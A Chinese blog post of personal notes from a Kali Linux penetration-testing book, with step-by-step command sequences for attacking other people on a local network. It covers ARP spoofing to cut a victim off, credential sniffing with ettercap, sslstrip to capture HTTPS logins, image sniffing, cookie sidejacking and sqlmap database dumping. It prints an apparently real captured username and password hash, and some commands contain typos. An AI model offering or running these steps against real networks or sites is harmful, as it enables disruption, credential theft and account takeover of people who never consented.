<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/
pace-theme-flash.css" rel="stylesheet">



<meta name="theme-color" content="#222">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "86c69b95"
    });
  daovoice('update');
  </script>















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/uploads/head.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/uploads/head.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/uploads/head.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="Arron Li" type="application/atom+xml">






<meta name="description" content="以下内容为博主学习《Kali Linux渗透测试的艺术》一书所记录的笔记，有点凌乱、还未整理，有时间再来弄。  一、换源并安装open-vm-tools1.1 打开sources.list文件1leafpad /etc/apt/sources.list 1.2 在文件中添加如下内容1234deb http://mirrors.edu.cn/kali sana main non-free cont">
<meta property="og:type" content="article">
<meta property="og:title" content="Kali基本操作">
<meta property="og:url" content="http://jacklxj.github.io/2018/09/28/Kali/index.html">
<meta property="og:site_name" content="Arron Li">
<meta property="og:description" content="以下内容为博主学习《Kali Linux渗透测试的艺术》一书所记录的笔记，有点凌乱、还未整理，有时间再来弄。  一、换源并安装open-vm-tools1.1 打开sources.list文件1leafpad /etc/apt/sources.list 1.2 在文件中添加如下内容1234deb http://mirrors.edu.cn/kali sana main non-free cont">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-02-02T16:36:08.405Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Kali基本操作">
<meta name="twitter:description" content="以下内容为博主学习《Kali Linux渗透测试的艺术》一书所记录的笔记，有点凌乱、还未整理，有时间再来弄。  一、换源并安装open-vm-tools1.1 打开sources.list文件1leafpad /etc/apt/sources.list 1.2 在文件中添加如下内容1234deb http://mirrors.edu.cn/kali sana main non-free cont">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://jacklxj.github.io/2018/09/28/Kali/">





  <title>Kali基本操作 | Arron Li</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/JackLXJ" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Arron Li</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>
            
            日程表
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://jacklxj.github.io/2018/09/28/Kali/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Arron Li">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/head.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Arron Li">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">Kali基本操作</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-09-28T13:54:02+08:00">
                2018-09-28
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/白帽子/" itemprop="url" rel="index">
                    <span itemprop="name">白帽子</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  13
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>以下内容为博主学习《Kali Linux渗透测试的艺术》一书所记录的笔记，有点凌乱、还未整理，有时间再来弄。</p>
</blockquote>
<h2 id="一、换源并安装open-vm-tools"><a href="#一、换源并安装open-vm-tools" class="headerlink" title="一、换源并安装open-vm-tools"></a>一、换源并安装open-vm-tools</h2><h3 id="1-1-打开sources-list文件"><a href="#1-1-打开sources-list文件" class="headerlink" title="1.1 打开sources.list文件"></a>1.1 打开sources.list文件</h3><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">leafpad /etc/apt/sources.<span class="built_in">list</span></span><br></pre></td></tr></table></figure>
<h3 id="1-2-在文件中添加如下内容"><a href="#1-2-在文件中添加如下内容" class="headerlink" title="1.2 在文件中添加如下内容"></a>1.2 在文件中添加如下内容</h3><figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">deb <span class="string">http:</span><span class="comment">//mirrors.edu.cn/kali sana main non-free contrib</span></span><br><span class="line">deb <span class="string">http:</span><span class="comment">//mirrors.edu.cn/kali-security/sana/updates main contrib non-free</span></span><br><span class="line">deb-src <span class="string">http:</span><span class="comment">//mirrors.ustc.edu.cn/kali-security/sana/updates main contrib non-free</span></span><br><span class="line">deb <span class="string">http:</span><span class="comment">//mirrors.ustc.edu.cn/kali kali-rolling main non-free</span></span><br></pre></td></tr></table></figure>
<h3 id="1-3-更新并安装"><a href="#1-3-更新并安装" class="headerlink" title="1.3 更新并安装"></a>1.3 更新并安装</h3><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-<span class="built_in">get</span> <span class="keyword">update</span></span><br><span class="line">apt-<span class="built_in">get</span> install <span class="keyword">open</span>-<span class="keyword">vm</span>-tools-desktop fuse</span><br></pre></td></tr></table></figure>
<h2 id="二、安装中文输入"><a href="#二、安装中文输入" class="headerlink" title="二、安装中文输入"></a>二、安装中文输入</h2><h3 id="2-1-下载搜狗"><a href="#2-1-下载搜狗" class="headerlink" title="2.1 下载搜狗"></a>2.1 下载搜狗</h3><p>在pinyin.sogou.com/linux中下载搜狗</p>
<h3 id="2-2-安装"><a href="#2-2-安装" class="headerlink" title="2.2 安装"></a>2.2 安装</h3><p>终端进入上方文件路径，执行如下：<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">解决依赖：apt-<span class="builtin-name">get</span> install -f</span><br><span class="line">安装：dpkg -i 包名</span><br></pre></td></tr></table></figure></p>
<h2 id="三、美化kali"><a href="#三、美化kali" class="headerlink" title="三、美化kali"></a>三、美化kali</h2><p>图标位置：/usr/share/icons/<br>主题位置：/usr/share/themes/</p>
<h3 id="四、局域网断网攻击"><a href="#四、局域网断网攻击" class="headerlink" title="四、局域网断网攻击"></a>四、局域网断网攻击</h3><h3 id="4-1-欺骗"><a href="#4-1-欺骗" class="headerlink" title="4.1 欺骗"></a>4.1 欺骗</h3><p>欺骗命令如下：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arpspoof -<span class="selector-tag">i</span> 网卡 -t 被骗目标ip 网关</span><br></pre></td></tr></table></figure></p>
<p>欺骗命令执行之前需要桥接自己的kali网络，其桥接过程如下：</p>
<ol>
<li>右键kali系统，点开设置</li>
<li>将网络适配器设置成桥接模式</li>
<li>一次点开：编辑 -&gt; 虚拟网络编辑器 -&gt; vmnet0 -&gt; 确定</li>
</ol>
<p>参数解读：</p>
<ol>
<li>网卡：网卡是kali的网卡名，可以使用ifconfig查看（可见eth0）</li>
<li>被骗目标ip：受害者的ip，windows用户可以使用ipconfig查看</li>
<li>网关：网关是一个中间载体，同样可以使用ipconfig查看（默认网关）</li>
</ol>
<p>ip查询：我们在对受害者进行arp欺骗的时候，往往是不知道对方的ip的，但是我么可以使用如下命令偷偷的查询对方ip：<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fping -asg <span class="number">192.168</span><span class="number">.31</span><span class="number">.0</span>/<span class="number">24</span> <span class="comment">//网关最后是0+24</span></span><br></pre></td></tr></table></figure></p>
<h3 id="4-2-攻击"><a href="#4-2-攻击" class="headerlink" title="4.2 攻击"></a>4.2 攻击</h3><h4 id="4-2-1-瘫痪对方的电脑"><a href="#4-2-1-瘫痪对方的电脑" class="headerlink" title="4.2.1 瘫痪对方的电脑"></a>4.2.1 瘫痪对方的电脑</h4><p>执行上述命令，即可让对方的网络瘫痪：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arpspoof -<span class="selector-tag">i</span> 网卡 -t 被骗目标ip 网关</span><br></pre></td></tr></table></figure>
<p>执行之后，对方就无法正常使用网络了（比如访问网页、qq聊天等等一切网络活动），ctrl+z之后取消瘫痪操作</p>
<h4 id="4-2-2-劫持对方的请求（账号，密码之类的）"><a href="#4-2-2-劫持对方的请求（账号，密码之类的）" class="headerlink" title="4.2.2 劫持对方的请求（账号，密码之类的）"></a>4.2.2 劫持对方的请求（账号，密码之类的）</h4><p>这里的劫持与上后面的瘫痪有点不同，劫持的话不能让对方网络瘫痪，所以我们在劫持之前需要进行如下命令操作（ip流量转发）：<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd /proc/sys/net/ipv4/  # 进入该目录</span><br><span class="line">cat ip_forward  # 查看属性值，会发现输出<span class="number">0</span>（默认是<span class="number">0</span>，我们需要更改为<span class="number">1</span>）</span><br><span class="line">echo <span class="number">1</span> &gt; ip_forward```# 将ip_forward值改为<span class="number">1</span></span><br></pre></td></tr></table></figure></p>
<p>如上操作之后我们继续执行arpspoof欺骗：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arpspoof -<span class="selector-tag">i</span> 网卡 -t 被骗目标ip 网关</span><br></pre></td></tr></table></figure></p>
<p>在欺骗之后，我们执行如下命令来进行嗅探：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ettercap -Tq -<span class="selector-tag">i</span> eth0</span><br></pre></td></tr></table></figure></p>
<p>执行之后发现，虽然这次对方可以正常使用网络，但是他的电脑已经在我们的监控中了，比如目标登录自己的某个站点，则在kali的终端上会输出对方的账号及密码</p>
<h4 id="4-2-4-嗅探对方的浏览图片"><a href="#4-2-4-嗅探对方的浏览图片" class="headerlink" title="4.2.4 嗅探对方的浏览图片"></a>4.2.4 嗅探对方的浏览图片</h4><p>在进行上述的ip流量转发之后，我们可以使用如下命令来截取对方浏览页面的图片：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">driftnet -<span class="selector-tag">i</span> eth0</span><br></pre></td></tr></table></figure></p>
<p>执行之后，会出现一个窗口    ，该窗口用于显示对方浏览页面的图片，并会将图片保存至kali本地</p>
<h2 id="五、https账号、密码获取"><a href="#五、https账号、密码获取" class="headerlink" title="五、https账号、密码获取"></a>五、https账号、密码获取</h2><h3 id="5-1-准备工作"><a href="#5-1-准备工作" class="headerlink" title="5.1 准备工作"></a>5.1 准备工作</h3><h4 id="5-1-1-Vim：文本编辑器"><a href="#5-1-1-Vim：文本编辑器" class="headerlink" title="5.1.1 Vim：文本编辑器"></a>5.1.1 Vim：文本编辑器</h4><p>进入文件进行编辑：vim 123.txt （不存在会自动创建）<br>退出文件编辑：</p>
<ol>
<li>按ESC </li>
<li>shift+： </li>
<li><ol>
<li>输入q！   # 不保存退出</li>
</ol>
</li>
</ol>
<p>打开 etterc.conf文件<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim <span class="regexp">/etc/</span>ettercap<span class="regexp">/ettc.conf/</span></span><br></pre></td></tr></table></figure></p>
<p>移动光标，把linux设置一下，将redir前的注释符删掉<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># <span class="keyword">if</span> you use iptables:</span><br><span class="line">   #redir_command_on = <span class="string">"iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</span></span><br><span class="line">   #redir_command_off = <span class="string">"iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</span></span><br></pre></td></tr></table></figure></p>
<p>刚开始是不能编辑的，编辑操作如下</p>
<ul>
<li><p>vim编辑：按一下 i 就可以对文件进行编辑了，在上述所述的位置将两个#去掉</p>
</li>
<li><p>vim保存：按一下ESC键，再按shift+:键，继续如下：</p>
</li>
</ul>
<ol>
<li>wq   保存并退出</li>
<li>q!   不保存并退出</li>
</ol>
<h4 id="5-1-2-开启ssh："><a href="#5-1-2-开启ssh：" class="headerlink" title="5.1.2 开启ssh："></a>5.1.2 开启ssh：</h4><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="regexp">/etc/i</span>nitd<span class="regexp">/ssh start</span></span><br></pre></td></tr></table></figure>
<h4 id="5-1-3-sslstrip工具"><a href="#5-1-3-sslstrip工具" class="headerlink" title="5.1.3 sslstrip工具"></a>5.1.3 sslstrip工具</h4><p>这个工具能够把https的链接还原为http。<br>执行命令：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sslstrip -<span class="selector-tag">a</span> -f -k</span><br></pre></td></tr></table></figure></p>
<p>参数说明：</p>
<ol>
<li>-a</li>
<li>-f</li>
<li>-k</li>
</ol>
<h3 id="5-2-截取账号及密码"><a href="#5-2-截取账号及密码" class="headerlink" title="5.2 截取账号及密码"></a>5.2 截取账号及密码</h3><ul>
<li><p>执行欺骗操作</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">arpspoof</span> <span class="selector-tag">-i</span> <span class="selector-tag">eth0</span> <span class="selector-tag">-t</span> 192<span class="selector-class">.168</span><span class="selector-class">.31</span><span class="selector-class">.117</span> 192<span class="selector-class">.168</span><span class="selector-class">.31</span><span class="selector-class">.1</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>执行sslstrip</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sslstrip -<span class="selector-tag">a</span> -f -k</span><br></pre></td></tr></table></figure>
</li>
<li><p>执行ettercap</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ettercap -Tq -<span class="selector-tag">i</span> eth0</span><br></pre></td></tr></table></figure>
</li>
<li><p>当目标用户登录https登录的时候就可以在kali终端获取到他的账号以及密码，例子如下：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">HTTP : <span class="number">211.80</span><span class="number">.112</span><span class="number">.41</span>:<span class="number">80</span> -&gt; </span><br><span class="line"><span class="symbol">USER:</span> <span class="number">1620814</span>  </span><br><span class="line"><span class="symbol">PASS:</span> <span class="number">741948</span>a7645fa6f8da44f69bd12e70443cc9d45b9714a26af17c84abe4e4d75a  </span><br><span class="line"><span class="symbol">INFO:</span> mids.gench.edu.cn/_customize/passLogin</span><br><span class="line"><span class="symbol">CONTENT:</span> loginTicket=<span class="number">425</span>d9c18<span class="number">-424</span>b<span class="number">-418</span>d-b027<span class="number">-2095e618</span>f829<span class="variable">&amp;username</span>=<span class="number">1620814</span><span class="variable">&amp;password</span>=<span class="number">741948</span>a7645fa6f8da44f69bd12e70443cc9d45b9714a26af17c84abe4e4d75a</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>分析：</p>
<ol>
<li>HTTP：ip及端口</li>
<li>USER：用户名</li>
<li>PASS：登录密码，注意：这里的密码并不是明文的，他是经过加密的，至于如何解密这个密码，以后有时间再来介绍</li>
<li>CONTENT：参数的组合</li>
</ol>
<h2 id="六、回话劫持，登录目标站点"><a href="#六、回话劫持，登录目标站点" class="headerlink" title="六、回话劫持，登录目标站点"></a>六、回话劫持，登录目标站点</h2><h3 id="6-1-工具准备"><a href="#6-1-工具准备" class="headerlink" title="6.1 工具准备"></a>6.1 工具准备</h3><ol>
<li>arpspoof     欺骗</li>
<li>wireshark        抓包</li>
<li>ferret       重新生成抓包后的文件</li>
<li>hamster</li>
</ol>
<p>ferret安装，一次执行如下：<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">dpkg --add-architecture i386 &amp;&amp; apt-<span class="builtin-name">get</span> update &amp;&amp; apt-<span class="builtin-name">get</span> install ferret-sidejack:i386</span><br><span class="line">apt-<span class="builtin-name">get</span> clean &amp;&amp; apt-<span class="builtin-name">get</span> update &amp;&amp; apt-<span class="builtin-name">get</span><span class="built_in"> upgrade </span>-y &amp;&amp; apt-<span class="builtin-name">get</span> dist-upgrade -y</span><br><span class="line">apt install ferret -y</span><br></pre></td></tr></table></figure></p>
<h3 id="6-2-过程（方法一）"><a href="#6-2-过程（方法一）" class="headerlink" title="6.2 过程（方法一）"></a>6.2 过程（方法一）</h3><ul>
<li>arpspoof欺骗</li>
<li><p>启动wireshark</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">wireshark</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>点击eth0网卡，并让他持续运行下去</p>
</li>
<li>目标登录某个站点（上钩）</li>
<li>为了防止延迟，让wireshark再运行一段时间之后停掉wireshark</li>
<li>保存文件名为cookie至桌面，并格式为wireshark…….pacp</li>
<li><p>终端进入桌面，并执行如下命令（这个ferret有点问题，在这记录一下，以后再来看）：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">ferret</span> <span class="selector-tag">-r</span> <span class="selector-tag">cookie</span><span class="selector-class">.pcap</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>执行hamster，会看到要求我们把代理改成本地（127.0.0.1）的，然后端口为1234</p>
</li>
</ul>
<ol>
<li>代开kali内置的火狐浏览器</li>
<li>点击设置 -&gt; Advanced -&gt; Network -&gt; Settings -&gt; 勾选Manual……并将http proxy改为127.0.0.1：1234</li>
</ol>
<ul>
<li>在kali中访问127.0.0.1：1234</li>
<li>之后会发现有个欺骗的ip，点开后就会出现很多的链接，ctrl+f找到</li>
</ul>
<h3 id="6-3-过程（方法二）"><a href="#6-3-过程（方法二）" class="headerlink" title="6.3 过程（方法二）"></a>6.3 过程（方法二）</h3><ul>
<li>ferret -i eth0</li>
<li>以后在记录</li>
</ul>
<h2 id="七、SQLMAP注入，ASP、PHP网站渗透"><a href="#七、SQLMAP注入，ASP、PHP网站渗透" class="headerlink" title="七、SQLMAP注入，ASP、PHP网站渗透"></a>七、SQLMAP注入，ASP、PHP网站渗透</h2><h3 id="7-1-科普"><a href="#7-1-科普" class="headerlink" title="7.1 科普"></a>7.1 科普</h3><h4 id="7-1-1-ASP"><a href="#7-1-1-ASP" class="headerlink" title="7.1.1 ASP"></a>7.1.1 ASP</h4><p>ASP即Active Server Pages，是MicroSoft公司开发的服务器端脚本环境，可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时，它会处理包含在用于构建发送给浏览器的HTML（Hyper Text Markup Language，超文本置标语言）网页文件中的服务器端脚本代码。除服务器端脚本代码外，ASP文件也可以包含文本、HTML（包括相关的客户端脚本）和com组件调用。 [1-2]<br>ASP简单、易于维护 ， 是小型页面应用程序的选择 ，在使用DCOM （Distributed Component Object Model）和 MTS（Microsoft Transaction Server）的情况下， ASP甚至可以实现中等规模的企业应用程序。 [3] </p>
<h4 id="7-1-2-PHP"><a href="#7-1-2-PHP" class="headerlink" title="7.1.2 PHP"></a>7.1.2 PHP</h4><p>PHP（外文名:PHP: Hypertext Preprocessor，中文名：“超文本预处理器”）是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点，利于学习，使用广泛，主要适用于Web开发领域。PHP 独特的语法混合了C、Java、Perl以及PHP自创的语法。它可以比CGI或者Perl更快速地执行动态网页。用PHP做出的动态页面与其他的编程语言相比，PHP是将程序嵌入到HTML（标准通用标记语言下的一个应用）文档中去执行，执行效率比完全生成HTML标记的CGI要高许多；PHP还可以执行编译后代码，编译可以达到加密和优化代码运行，使代码运行更快。</p>
<h3 id="7-2-ASP渗透"><a href="#7-2-ASP渗透" class="headerlink" title="7.2 ASP渗透"></a>7.2 ASP渗透</h3><ul>
<li>监测是否存在注入<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">sqlmap</span> -u 网站</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>如果该目标网站有注入，则会返回数据库的各种信息。</p>
<ul>
<li><p>拆解目标网站的数据库表</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u 网站 <span class="comment">--tables</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>根据User表拆解列名</p>
<figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlamp -u 网站 --<span class="built_in">columns</span> -<span class="built_in">T</span> <span class="string">"user"</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>username拆解出来后就不需要再进行拆解了</p>
</li>
